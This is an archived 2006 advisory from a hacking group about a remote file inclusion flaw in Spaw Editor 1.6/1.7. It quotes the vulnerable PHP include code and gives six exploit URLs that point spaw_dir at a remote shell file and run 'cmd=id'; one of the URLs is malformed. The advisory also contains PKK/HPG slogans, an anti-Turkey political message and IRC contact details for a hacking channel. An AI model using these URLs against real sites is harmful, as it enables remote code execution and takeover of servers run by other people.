[Kurdish Security # 23] Spaw Editor Remote Include Vulnerability

2006-08-21T00:00:00
ID SECURITYVULNS:DOC:13973
Type securityvulns
Reporter Securityvulns
Modified 2006-08-21T00:00:00

Description

  • Kurdish Security Advisory
  • Spaw Editor Remote Include Vulnerability
  • Our Party is PKK, Our Army HPG, We will Earn
  • contact ? : irc.gigachat.net #kurdhack & botan@linuxmail.org
  • Risk : High
  • Class : Remote
  • Script : Spaw Editor
  • Version : v1.6 and v1.7
  • Site : www.solmetra.com

<? // include wysiwyg config include '../config/spaw_control.config.php'; include $spaw_root.'class/lang.class.php';

$theme = empty($HTTP_GET_VARS['theme'])?$spaw_default_theme:$HTTP_GET_VARS['theme']; $theme_path = $spaw_dir.'lib/themes/'.$theme.'/';

$l = new SPAW_Lang($HTTP_GET_VARS['lang']); $l->setBlock('colorpicker'); ?>

http://site.com/[path]/dialogs/a.php?spaw_dir=http://www.shell.txt?&cmd=id http://site.com/[path]/dialogs/collorpicker.phpspaw_dir=http://www.shell.txt&cmd=id http://site.com/[path]/dialogs/img.php?spaw_dir=http://www.shell.txt?&cmd=id http://site.com/[path]/dialogs/img_library.php?spaw_dir=http://www.shell.txt?&cmd=id http://site.com/[path]/dialogs/table.php?spaw_dir=http://www.shell.txt?&cmd=id http://site.com/[path]/dialogs/td.php?spaw_dir=http://www.shell.txt?&cmd=id

Speacial MSG! : The Turk state is the aggressor behavior Don't stay quite. Hear the Kurdish people is scream be late.. Stop the Turkey Military!